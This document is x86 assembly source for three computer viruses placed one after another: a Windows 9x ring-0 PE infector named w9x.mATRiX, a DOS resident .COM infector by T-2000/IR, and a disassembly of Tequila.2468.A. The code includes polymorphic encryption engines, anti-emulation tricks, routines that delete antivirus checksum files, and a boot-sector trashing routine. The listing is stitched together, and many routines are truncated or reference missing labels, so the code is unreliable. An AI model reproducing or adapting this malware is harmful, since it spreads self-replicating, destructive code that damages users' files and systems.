;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ÿ
.486p
.model flat
locals
jumps
if debug eq 1
inthook equ 05h ;let's hook this int for ring0
else
inthook equ 03h ;let's hook this int for ring0
endif
if debug eq 1
; display "Debug Version"
else
display " °±²Û *Warning* This is the real version of the virus Û²±°"
endif
start:
pushad
call getdelta
getdelta:
pop ebp
sub ebp,offset getdelta
pushad
setupSEHandKillEmu:
xor edx,edx ;fs:[edx] = smaller then fs:[0]
push dword ptr fs:[edx] ;Push original SEH handler
mov fs:[edx],esp ;And put the new one (located
dec byte ptr cs:[edx] ;make error & let our SEH take
;control (not nice 4 emu's:)
backtocode:
popad
SetupSEH:
xor edx,edx ;we are save now, if an error
push dword ptr fs:[edx] ;occure EIP will be at the
mov fs:[edx],esp ;code after SetupSEH
push edx
sidt fword ptr [esp-2] ;'push' int table
pop edx ;restore stack from call and
;edx contains pointer to IDT
RestoreSEH:
xor edx,edx
pop dword ptr fs:[edx]
pop edx ;pops offset pushed by CALL
popad
push eax
ret
;----------------------------------------------------------------------------;
; **** RING0 LOADER ****
;----------------------------------------------------------------------------;
Inthandler:
pushad
mov eax,0bff70404h ;already loaded?
cmp dword ptr [eax],eax
je back2ring3
mov dword ptr [eax],eax
push eax
push edi
lea esi,[offset start+ebp] ;set source
mov ecx,virusz ;virussize
cld ;you never know with poly :)
rep movsb ;copy virus to allocated mem
pop edi
mov [edi+nexthook-start],eax
pop eax
push PC_STATIC
push 020060000h ;new paging settings
push SizeInPages*2
shr eax, 12
push eax
VxD5V equ 00010133h
VxD5: VMMCall PageModifyPermissions
add esp, 4*4
if debug eq 1
call debug_beep2
endif
back2ring3:
if debug eq 1
call debug_beep
endif
popad
iretd ;exit int (to ring3!)
;----------------------------------------------------------------------------;
host:
oldbytes:
Push 0
Call ExitProcess
db JmpToCodesz-5 dup (176d)
;----------------------------------------------------------------------------;
; **** FILESYSTEM HOOK ****
;----------------------------------------------------------------------------;
hook:
push ebp
mov ebp,esp
sub esp,20h
push ebx
push esi
push edi
if debug eq 1
cmp dword ptr [death-start+edi],'TRUE'
je back
endif
back:
mov eax,[ebp+28] ; call the old
push eax
mov eax,[ebp+24]
push eax
mov eax,[ebp+20]
push eax
mov eax,[ebp+16]
push eax
mov eax,[ebp+12]
push eax
mov eax,[ebp+8]
push eax
db 0b8h
nexthook dd 0
call [eax]
add esp,6*4
pop edi
pop esi
pop ebx
leave
ret
;----------------------------------------------------------------------------;
; **** SOME CHECKS BEFORE INFECTING ****
;----------------------------------------------------------------------------;
infect:
pushad
if debug eq 1
mov eax,0bff70400h
mov eax,dword ptr [eax]
or eax,eax
jz stayalive ;kill ourself?
call debug_beep
call debug_beep2
call debug_beep2
call debug_beep2
call debug_beep
mov eax,0bff70400h
xor edx,edx
mov dword ptr [eax],edx
mov dword ptr [eax+4],edx
stayalive:
endif
not eax ;
cmp eax,not 'EXE.' ;normal exe?
je infectit
quitinfect:
jmp back
db "<w9x.mATRiX."
db virusz/1000 mod 10+'0'
db virusz/0100 mod 10+'0'
db virusz/0010 mod 10+'0'
db virusz/0001 mod 10+'0',"."
counter db "0001086 & MyLittlePoly." ;enough space for counter :)
db polysz/1000 mod 10+'0'
db polysz/0100 mod 10+'0'
db polysz/0010 mod 10+'0'
db polysz/0001 mod 10+'0'
if debug eq 1
db " Debug Version"
endif
cryptkey dd 0
cryptkey2 dw 0
;----------------------------------------------------------------------------;
; **** REAL PE INFECTION PART ****
;----------------------------------------------------------------------------;
infectit:
call checkname
jc quitinfect ;if name = bad
if debug eq 1
cmp word ptr [esi],":D"
jne quitinfect
endif
pop eax
inc eax ;eax=4300+1 = set
push eax
push ecx ;save attribs
push esi ;and esi,no new LEA needed
xor ecx,ecx ;new attr
call R0_FileIO
push ebp
push edi
push ebx ;save handle for after calcs.
mov ebp,edi
mov edi,esi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
;optionalheader+size=allocation table
push esi
xor ecx,ecx
mov cx,word ptr [edi+6] ;put in ecx nr. of sections
xor eax,eax ;startvalue of eax
push cx ;
sectionsearch:
cmp dword ptr [esi+14h],eax ;is it the highest?
jb lower ;no
mov ebx,ecx ;remember section nr.
mov eax,dword ptr [esi+14h] ;and remember value
lower:
add esi,28h ;steps of 28h
loop sectionsearch
pop cx
sub ecx,ebx
push esi
add eax,[esi+0Ch]
mov [edi+50h],eax
mov esi,edi
add esi,18h ;esi+18h=start of OptionalHeader
add si,word ptr [esi+14h-18h] ;esi-4 = pe/0/0+14h = size OH
sub esi,28h
pop esi
pop edx
pop ebx
push edx ;
push esi
push eax
mov eax,ecx
mov ecx,[edi+3Ch] ;ECX = Alignment
push edx ; Align
xor edx,edx
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
pop edx
mov ecx,eax ;aligned size to append
pop esi
pop edx
push edi
lea esi,[ebp+viruscopy-start] ;polymorfer returns size in
mov eax,R0_WRITEFILE ;the ECX register
push eax
call R0_FileIO ;append virus
pop eax
pop esi
mov ecx,1024
mov edx,[ebp+pointertope-start]
call R0_FileIO ;overwrite PE header
pop edi
pop ebp
nope:
mov eax,R0_CLOSEFILE
call R0_FileIO
if debug eq 1
call debug_beep
endif
call killAVfiles
call infectwindotcom ;for payload
jmp dontinfect
avpcrc db 9,"AVP.CRC",0h
antivirdat db 14,"ANTI-VIR.DAT",0h
ivbntz db 9,"IVB.NTZ",0h
chklistms db 12,"CHKLIST.MS",0h
killAVfiles:
pushad
;first add the path to the filename
mov ebp,edi
mov ecx,4
killing:
call killthisfile
xor ebx,ebx
mov bl,byte ptr [edx]
add edx,ebx
loop killing
popad
ret
killthisfile:
pushad
lea edi,[offset filename-start+ebp]
push edi
mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1
xor ecx,ecx
cld
mov esi,edx
lodsb
mov cl,al
rep movsb
pop esi
mov eax,R0_DELETEFILE
mov ecx,2027h
call R0_FileIO
popad
ret
;--------------------------------------------------------------------------
; **** MODIFIES COM FILES FOR PAYLOAD, SPECIAL FOR WIN.COM ***
;--------------------------------------------------------------------------
infectwindotcomflag db 0h
push edi
jmp payloadinfector
backfrominfecting:
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
payloadinfector:
if debug eq 1
cmp dword ptr [esi-8],'PRUB' ;*BURP.COM ?
jne wegvancom
endif
mov eax,R0_GETFILESIZE
call R0_FileIO ;get it's size
push eax
sub eax,4
mov word ptr [edi+jmpval-start],ax ;distance to jmp
pop eax
pop edx ;place to append
push edx
lea esi,[edi+offset dospayload-start]
mov ecx,dospayloadsize
call R0_FileIO
pop edx
mov ecx,7
closecomfile:
mov eax,R0_CLOSEFILE
call R0_FileIO
wegvancom:
if debug eq 1
call debug_beep
endif
jmp quitinfect
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; *** BEEPS used if debug equ 1 ***
;--------------------------------------------------------------------------
if debug eq 1
debug_beep:
push eax
push ecx
mov eax,0bff70408h
cmp byte ptr [eax],0
jne geenirritantgebiepvandaag
in al, 61h
or al, 3
out 61h, al
in al, 61h
and al, not 3
out 61h, al
pop ecx
pop eax
ret
debug_beep2:
push eax
push ecx
in al, 61h
or al, 3
out 61h, al
in al, 61h
and al, not 3
out 61h, al
pop ecx
pop eax
ret
endif
;--------------------------------------------------------------------------
; File IO function, called lot of times, better for patching callback
;--------------------------------------------------------------------------
R0_FileIO:
VxD4V equ Ring0_FileIO+256*256*IFSMgr
VxD4: VxDCall IFSMgr, Ring0_FileIO
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; Increases the ASCII counter of infections
;--------------------------------------------------------------------------
next:
inc byte ptr [esi]
cmp byte ptr [esi],'9'+1
jb ok
mov byte ptr [esi],'0'
dec esi
jmp next
ok:
ret
;--------------------------------------------------------------------------
;------------------------------------------------------------------------------
; Some things used in the registery payload
;------------------------------------------------------------------------------
KeyOfPolicies db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0h
valuename1 db "NoClose",0h ;no shutdown :)
ValueToSet dd 1h
CheckThePayloadDate:
add esp,6*4
noPayload:
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; Patches the VxDCalls (on execute windows modifies them to a real call)
;--------------------------------------------------------------------------
VxDPatch:
pushad
mov bx,020cdh ;int 20 used by VxDCall
popad
ret
;--------------------------------------------------------------------------
rnd32_seed dd 0h
;------ this code is putted at EIP of host and jmps to virus code -----------;
JmpToCode:
stc
db 066h,0fh,083h ;jnc
randombla dw ? ;some place
mov eax,12345678h
distance equ $-4
push eax
ret
EndJmpToCode:
;----------------------------------------------------------------------------;
;this sweet code will be appended to .com files (234 / 0eah bytes large)
;--------------------------------------------------------------------------
; * Checks the name of the file to be infected
;--------------------------------------------------------------------------
mov al,'.'
cld
scasb ;search from left to right for the dot
jne $-1
std
mov al,'\' ;search from right to left for the \
scasb
jne $-1
cld
checkname2:
xor eax,eax ;for load AL
lodsb ;size of string in al
or al,al
jz didit
mov ecx,eax ;counter for bytes
push edi ;save pointer to filename
rep cmpsb ;compare stringbyte
pop edi
jz ArghItIsAshitFile
add esi,ecx
jmp checkname2
ArghItIsAshitFile:
popad
stc
ret
didit:
popad
clc
ret
;--------------------------------------------------------------------------
;--------------------------------------------------------------------------
; *** POLYMORFIC engine which generates decrypter & encrypts code ***
;--------------------------------------------------------------------------
;
; The generated code will look like this:
;
; pushad
; lea RegUsedAsPointer,[eax+placewherecryptedcodestarts]
; mov keyregister,randomvalue
; sub keyregister,randomvalue
; mov counterreg,size
; again:
; mov tempregister,[RegUsedAsPointer]
; xor tempregister,keyregister
; mov [RegUsedAsPointer],tempregister
; add RegUsedAsPointer,4
; dec counterreg
; pushf
; popf
; jz exit
; jmp again
; exit:
;
;
; between each instruction some random code is putted.
polysz equ offset polyend - offset encrypt
encrypt:
push eax
push ebx
push edx
push esi
push edi
call gengarbage
;--------PUSHAD--
mov al,60h ;pushad
stosb
;--------MOV-----
call gengarbage
call gengarbage
call gengarbage
;--------MOV-----
add al,0b8h ;make a MOV reg, rndvalue
stosb
call get_rnd32
stosd
;----------------
call gengarbage
;--------SUB-----
mov al,081h ;make a SUB reg, rndvalue
add ah,0e8h
stosw
call get_rnd32
stosd
;----------------
getregforsize:
call getrndal
cmp al,4 ;do not use ESP
je getregforsize
cmp al,cl ;nor keyreg
je getregforsize
cmp al,ch ;nor offsetreg
je getregforsize
mov dh,al
call gengarbage
;*** AT THIS POINT IS EDI THE OFFSET FOR THE JMP ***
mov esi,edi
mov dl,al
call gengarbage
call gengarbage
call gengarbage
mov al,dl
call gengarbage
call gengarbage
call gengarbage
inc ah ;popf
stosw
;---JZ OVER------
mov ax,074h
stosw
push edi
;----------------
call gengarbage
mov edx,edi
sub edx,eax
cmp edx,080h-5 ;80h = max JZ distance, 5 is size of JMP BACK
ja regenerate
;----JMP BACK----
sub esi,edi
mov al,0e9h
stosb
mov eax,0fffffffbh
add eax,esi
stosd
;----------------
;----PATCH JZ----
pop esi ;esi-1 = jz value
mov eax,edi
sub eax,esi
mov byte ptr [esi-1],al
;----------------
call gengarbage
;----POPAD-------
mov al,61h ;popad
stosb
;----------------
call gengarbage
;----PATCH LEA---
pop esi ;patch LEA reg1,[EAX+startofcrypted]
push edi
sub edi,offset viruscopy-start
sub edi,ebp
mov dword ptr [esi+2],edi
pop edi
;----------------
pop edi
pop esi
pop edx
pop ebx
pop eax
ret
;----------------------------------------------------------------------------;
; Generates lot of rnd instructions which look good but do nothing
; (they undo themself indirect)
;----------------------------------------------------------------------------;
gengarbage:
push eax
push ebx
push ecx
push edx
push esi
garbageloop:
call get_rnd32
and al,1111b
cmp al,1
je genadd ;OK
cmp al,2
je gensub ;OK
cmp al,3
je genxor ;OK
cmp al,4
je genmov ;OK
cmp al,5
je genpush ;OK
cmp al,6
je geninc ;OK
cmp al,7
je gendec ;OK
cmp al,8
je gencmp ;OK
cmp al,9
je genjunk ;OK
cmp al,0eh
jb garbageloop
exitgen:
pop esi
pop edx
pop ecx
pop ebx
pop eax
ret
;-----------------------------------------------------------------------------
; Generates random add
;-----------------------------------------------------------------------------
genadd:
call getrndal
cmp al,4
je genadd ;4 = esp, leave him alone
cmp ah,80h
jb addandsub ;generate an add - code - sub
and eax,111b
call pushregister
call gengarbage
call gengarbage
call popregister
jmp exitgen
savetoadd:
call randomadd
jmp exitgen
addandsub:
push eax
xchg al,ah
mov al,081h
add ah,0c0h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
add ah,028h
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub
;-----------------------------------------------------------------------------
gensub:
call getrndal
cmp al,4
je gensub ;4 = esp, leave him alone
cmp ah,80h
jb subandadd ;generate an add - code - sub
and eax,111b
call pushregister
call gengarbage
call gengarbage
call popregister
jmp exitgen
savetosub:
call randomsub
jmp exitgen
subandadd:
push eax
xchg al,ah
mov al,081h
add ah,0e8h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
sub ah,028h
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random xor
;-----------------------------------------------------------------------------
genxor:
call getrndal
cmp al,4
je genxor
cmp ah,80h
jb genxorxor ;generate an xor - code - xor
and eax,111b
jmp exitgen
savetoxor:
call randomxor
jmp exitgen
genxorxor:
push eax
xchg al,ah
add ah,0f0h
mov al,081h
stosw
push eax
call get_rnd32
stosd
push eax
call gengarbage
pop ebx
pop eax
stosw
mov eax,ebx
stosd
pop eax
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random mov
;-----------------------------------------------------------------------------
genmov:
call getrndal
cmp al,4
je genmov
jmp exitgen
savetomov:
call randommov
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random push
;-----------------------------------------------------------------------------
genpush:
call getrndal
cmp al,4
je genpush
and eax,111b
call pushregister
call gengarbage
call popregister
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random inc
;-----------------------------------------------------------------------------
geninc: ;40
call getrndal
cmp al,4
je geninc
cmp ah,80h
ja genincdec
and eax,111b
call pushregister
call gengarbage
add al,040h
stosb
call gengarbage
sub al,040h
call popregister
jmp exitgen
savetoinc:
add al,040h
stosb
jmp exitgen
genincdec:
add al,40h ;inc
stosb
call gengarbage
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random dec
;-----------------------------------------------------------------------------
gendec: ;48
call getrndal
cmp al,4
je gendec
cmp ah,80h
ja gendecinc
and eax,111b
call pushregister
call gengarbage
add al,048h
stosb
call gengarbage
sub al,048h
call popregister
jmp exitgen
savetodec:
add al,048h
stosb
jmp exitgen
gendecinc:
add al,48h
stosb
call gengarbage
sub al,8h
stosb
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pushes register in al
;-----------------------------------------------------------------------------
pushregister:
push eax
add al,050h
stosb
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Pops register in al
;-----------------------------------------------------------------------------
popregister:
push eax
add al,058h
stosb
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg, value or add reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomadd:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja addregreg
call randomaddvalue
rndaddb:
pop eax
ret
addregreg:
call randomaddreg
jmp rndaddb
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg,value - reg = al
;-----------------------------------------------------------------------------
; 81 c0+reg value
; reg = eax 05 value
randomaddvalue:
push eax
xchg al,ah
mov al,081h
add ah,0c0h
stosw
backfromaddeax:
call get_rnd32
stosd
pop eax
ret
addeax:
mov al,05h
stosb
jmp backfromaddeax
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random add reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomaddreg:
push eax
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,03h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg, value or sub reg1,reg2 - reg = al
;-----------------------------------------------------------------------------
randomsub:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja subregreg
call randomsubvalue
rndsubb:
pop eax
ret
subregreg:
call randomsubreg
jmp rndsubb
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg,value - reg = al
;-----------------------------------------------------------------------------
; 81 c0+reg value
; reg = eax 05 value
randomsubvalue:
push eax
xchg al,ah
mov al,081h
add ah,0e8h
stosw
backfromsubeax:
call get_rnd32
stosd
pop eax
ret
subeax:
mov al,05h
stosb
jmp backfromsubeax
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates random sub reg1,reg2 - reg1 = al
;-----------------------------------------------------------------------------
randomsubreg:
push eax
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,03h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a xor reg, value or xor reg, reg2 - reg = al
;-----------------------------------------------------------------------------
randomxor:
push eax
call get_rnd32
cmp al,80h
pop eax
push eax
ja xorvalue
call randomxorreg
rndxorr:
pop eax
ret
xorvalue:
call randomxorvalue
jmp rndxorr
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random xor reg,reg2 - reg = al
;-----------------------------------------------------------------------------
randomxorreg:
push eax ;6633
mov bl,al
call getrndal
shl bl,3
add al,0c0h
mov ah,033h
xchg ah,al
stosw
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random xor reg,value
;-----------------------------------------------------------------------------
randomxorvalue:
push eax
add al,0f0h
mov ah,081h
xchg al,ah
stosw
call get_rnd32
stosd
pop eax
ret
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; generates a random mov reg,value or reg,reg2
;-----------------------------------------------------------------------------
randommov:
push eax
cmp ah,080h
jb movreg
call randommovvalue
movback:
pop eax
ret
movreg:
call randommovreg
jmp movback
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generates a random mov reg,value
;-----------------------------------------------------------------------------
randommovvalue:
push eax
add al,0b8h
stosb
call get_rnd32
stosd
pop eax
ret
;-----------------------------------------------------------------------------
; generates a random mov reg,reg2
;-----------------------------------------------------------------------------
randommovreg: ;8b (c0+reg) or reg2
push eax
mov bl,al
call getrndal
shl bl,3
or al,bl ;mix instructions
xchg ah,al
mov al,08bh
add ah,0c0h
stosw
pop eax
ret
;-----------------------------------------------------------------------------
; generates a random cmp reg,reg2 or cmp reg,value
;-----------------------------------------------------------------------------
gencmp: ;39/3b
call get_rnd32
cmp ah,0c0h
jb gencmp
cmp al,80h
ja gencmpvalue
push eax
call get_rnd32
mov bh,039h
cmp al,80h
ja gencmp1
add bh,2
gencmp1:
pop eax
mov al,bh
cld
stosw
jmp exitgen
gencmpvalue: ;81f8
and eax,0111b
add ax,081f8h
xchg al,ah
stosw
call get_rnd32
stosd
jmp exitgen
;-----------------------------------------------------------------------------
;-----------------------------------------------------------------------------
; Generate junk f8 - fd
;-----------------------------------------------------------------------------
genjunk:
call get_rnd32
cmp al,0f8h
jb genjunk
cmp al,0fdh
ja genjunk
stosb
jmp exitgen
;-----------------------------------------------------------------------------
getrndal:
call get_rnd32
and al,111b
ret
xchg eax,ecx
rdtcs ;just 4 some xtra randomness
xchg eax,ecx
xor eax,ecx
pop esi
pop edi
pop edx
pop ebx
pop ecx
ret
polyend:
end:
;----------------------------------------------------------------------------;
pointertope dd ?
if debug eq 1
death dd ? ;kill ourself flag
endif
busy dd ?
filename db 100h dup (0h)
peheader db 1024 dup (0h)
whereappend dd ?
pushtable db 8 dup (0h)
memend:
_CODE ends
;----------------------------------------------------------------------------;
;----------------------------------------------------------------------------;
_DATA segment dword use32 public 'DATA'
fill db ?
_DATA ends
_burp segment dword use32 public 'LiFEwiRE'
fill2 db ?
_burp ends
;----------------------------------------------------------------------------;
end start
end
; Resident .COM midfile infector - 666 bytes - 02/2000 by T-2000/IR.
; Uses the INT 21h ISR to locate a suitable place to put the CALL_Virus.
.286
.MODEL TINY
.CODE
START:
PUSHF ; Save registers.
PUSHA
PUSH DS
PUSH ES
CALL Get_IP
DEC CX ; CX = -1
JNP Restore_Host ; Endless loop?
XOR DI, DI
PUSH ES
PUSH ES
POP DS
POP DS
Trash_Boot:
MOV AL, 2 ; Trash the bootsector of C:.
MOV CX, 1
XOR DX, DX
SEGCS ; Stupid anti-TBClean trick.
INT 26h
New_Int21h:
CMP AX, 2000h ; Virus residency call.
JNE Check_Exit
CBW ; AX = 0.
MOV BP, SP
MOV DS, [BP+(11*2)] ; DS = CS of calling INT 21h.
XCHG SI, AX ; SI = 0.
CALL Infect_File
Seek_EOF:
MOV AX, 4202h ; Seek to the end of file.
XOR CX, CX
CWD
INT 66h
Do_RETN: RETN
Infect_File:
MOV AX, 4300h ; Get file's attributes.
LEA DX, [SI+3]
INT 66h
JC Do_RETN
JMP Restore_Attr
PUSH CS
POP DS
CALL Seek_EOF
MOV DX, DI
DEC DH ; Minus PSP (100h).
PUSH DX
POP DX
SUB SI, 3
CALL Seek_EOF
RETN
End_Body:
Int_Count DB 0
Header DB 4 DUP(0)
; Amen.
END START
; Tequila.2468.A (exact) disasm.
; Multipartite semi-stealth polymorphic MBS & .EXE-infector.
; Bugs marked with '***'.
; T-2000/IR, March 2000.
.MODEL TINY
.STACK 512
.CODE
START:
Check_Activate:
PUSH BP
MOV BP, SP
PUSH CS
POP DS
XOR BX, BX
MOV CX, 30
MOV [BP-(4*2)], AX
MOV [BP-(3*2)], DX
MOV [BP-(6*2)], AX
MOV [BP-(5*2)], DX
CMP DX, 15
JAE LOC_12
ADD AX, DI
MOV [BP-(2*2)], AX
ADD AX, SI
MOV [BP-(1*2)], AX
LOOP LOCLOOP_11
LOC_12: INC CX
SHR CL, 1
MOV CH, CL
MOV CL, 0DBh
MOV ES:[BX], CX
INC BX
INC BX
ADD SI, 18
CMP SI, 1B8h
JL LOC_10
ADD DI, 52
Exit_Activate: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
MOV SP, BP
POP BP
RETN
PUSH CS
POP DS
POP DS
POP DX
RETN
XOR DI, DI
Relocated_Boot: PUSH CS
POP DS
PUSH CS
POP ES
CLD
MOV SI, OFFSET New_Int13h
MOV DI, OFFSET New_Int13h_Copy
MOV CX, (New_Int1Ch-New_Int13h)
REP MOVSB
MOV SI, OFFSET Append_Body_Encrypted
MOV DI, OFFSET Append_Body_Encrypted_Copy
MOV CX, (Decryptor-Append_Body_Encrypted)
REP MOVSB
CLI
STI
Init_Virus:
CALL Get_IP ; Calculate the virus'
Get_IP: POP SI ; delta offset in this CS.
SUB SI, OFFSET Get_IP
PUSH CS
POP DS
ADD [SI+(Host_CS-START)], AX
ADD [SI+(Host_SS-START)], AX
CMP BYTE PTR ES:[0], 'Z' ; Make sure this block is the
JNE Run_Host ; last one in the chain, else
; higher blocks might get
; damaged.
PUSH ES ; DS=ES=PSP.
POP DS
Infect_MBS:
MOV AH, 2Ah ; Get the current date.
INT 21h
PUSH DS
POP ES
PUSHF
JMP Exit_Inf_MBS
JMP Exit_Inf_MBS
PUSHF
CALL DWORD PTR Old_Int13h
JC Exit_Inf_MBS
INC CX
Exit_Inf_MBS: RETN
New_Int01h:
PUSH BP ; Setup a stack pointer.
MOV BP, SP
PUSH AX
PUSH ES
POP ES
POP AX
Exit_Int01h: POP BP
IRET
New_Int13h:
CMP CX, 1 ; Track 0, sector 1 ?
JNE JMP_Old_Int13h
PUSH CX
PUSH DX
PUSH AX
PUSH BX
POP DX
POP CX
New_Int1Ch:
PUSH AX
PUSH BX
PUSH ES
PUSH DS
PUSH CS
POP DS
Exit_Int1Ch: POP DS
POP ES
POP BX
POP AX
IRET
New_Int21h:
CMP AH, 11h ; Findfirst (FCB) ?
JB Check_Dir_St
CALL Display_Message
IRET
CALL Check_Activate
JMP Restore_Stack
New_Int24h:
MOV AL, 03h ; Fail operation.
IRET
FCB_Stealth:
PUSH BX
PUSH ES
PUSH AX
PUSHF
PUSH AX
Exit_FCB_St: POP AX
POPF
POP ES
POP BX
RETN
Dir_Stealth:
PUSH BX
PUSH ES
PUSH AX
POP AX
PUSHF
PUSH AX
JC Exit_Dir_St ; Get out if error.
Exit_Dir_St: POP AX
POPF
POP ES
POP BX
RETN
Write_File:
MOV AH, 40h ; Write to file.
JMP Do_Read_Write
Read_File:
MOV AH, 3Fh ; Read from file.
Do_Read_Write: CALL Load_BX_Int21h
JC Exit_Re_Wr ; If error then exit with CF.
Seek_EOF:
XOR CX, CX ; Seeks to end of file.
XOR DX, DX
Seek_EOF_Rel: MOV AX, 4202h ; Seeks EOF relative.
JMP Load_BX_Int21h
Seek_BOF:
XOR CX, CX ; Seeks to begin of file.
XOR DX, DX
MOV AX, 4200h
Load_BX_Int21h: MOV BX, CS:File_Handle ; Load the filehandle.
RETN
Infect_File:
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
PUSH ES
PUSH DS
JMP Exit_Infect
Init_Infect: PUSH DX
PUSH DS
PUSH CS
POP DS
JNC Blank_Attr
DB 0E9h, 7Eh, 0
; * JMP Restore_Int24h *
PUSH DX
PUSH DS
PUSH CS
POP DS
Exit_Infect: POP DS
POP ES
POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
RETN
; Returns CF when the filename holds 'SC' or a 'V', this includes most
; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.
Check_File_Name:
PUSH DS
POP ES
MOV DI, DX
MOV SI, CX
LOOP Find_SCan
RETN
RETN
; Trash signature.
Not_Protected: CLC
RETN
Add_Virus:
CALL Seek_EOF
JMP Exit_Add_Virus
CALL Seek_EOF
ADD AX, Virus_Size ; Calculate size after
ADC DX, 0 ; infection.
MOV Header.File_512_Pages, AX
MOV Header.Image_Mod_512, DX
CALL Seek_BOF
Exit_Add_Virus: RETN
; The decryptors being generated are quite simple, they are effectively
; enough against pure signature scanners, though can be found with a simple
; algorithmic approach. A pecularity is that the decryptors use themselves
; as a key, which drastically complicates debugging.
Poly_Engine:
PUSH BP
MOV AX, DX
MOV BP, DX ; BP is used as a pointer to
; random data.
PUSH DS
POP ES
INC SI
POP BP
RETN
Make_Load_DS:
DEC BP ; Adjust random pointer.
; *** Not needed as this is
; the first reference to it.
CALL Add_Junk
RETN
CALL Add_Junk
RETN
Make_Load_Ptr:
AND CH, 11111110b ; BX is start code.
; *** CX is already zero.
DEC BP
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
RETN
Make_Decr_Loop:
MOV AH, 14h ; DL, [SI]
MOV DH, 17h ; DL, [BX]
CALL Add_Junk
DEC BP
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
CALL Add_Junk
MOV AX, DI
CALL Add_Junk
RETN
Add_Junk:
DEC BP
DEC BP
MOV AL, ES:[BP]
TEST AL, 00000010b
JZ Junk_CMP
JMP Exit_Add_Junk
JMP Exit_Add_Junk
Make_Operand: DEC BP
MOV AH, ES:[BP]
JMP Exit_Add_Junk
Junk_CMP: DEC BP
Exit_Add_Junk: RETN
Append_Body_Encrypted:
CALL Crypt_Virus
PUSHF
CALL DWORD PTR Old_Int21h
JC Crypt_Loop
SUB AX, CX
Crypt_Loop: PUSHF
POPF
RETN
Crypt_Virus:
MOV BX, 0
MOV SI, OFFSET Decryptor
MOV CX, OFFSET Decryptor
INC SI
INC BX
RETN
Decryptor:
PUSH CS
TEST CL, BL
MOV BX, 0
TEST SP, AX
CLD
TEST CH, BL
TEST AX, CX
Decrypt_Byte: MOV DL, [SI] ; Get the key from the
; decryptor.
DB 039h, 0D8h
; * CMP AX, BX *
NOP
NOP
Decrypt_Loop: NOP
CLD
Old_Int13h DW 0, 0
End_Body:
Buffer:
File_Handle DW 0
Old_SP DW 0
Old_SS DW 0
Old_Attr DW 0
Old_File_Date DW 0
Old_File_Time DW 0
Old_Int1Ch DW 0, 0
Old_Int21h DW 0, 0
Old_Int24h DW 0, 0
Int_Count DW 0
New_Int13h_Copy:
DB (New_Int1Ch-New_Int13h) DUP(0)
Append_Body_Encrypted_Copy:
DB (Decryptor-Append_Body_Encrypted) DUP(0)
Header DW 14 DUP(0)
Validate_Header DW 4 DUP(0)
ORG Buffer+512
End_Heap:
Carrier:
MOV AX, 4C00h
INT 21h
EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
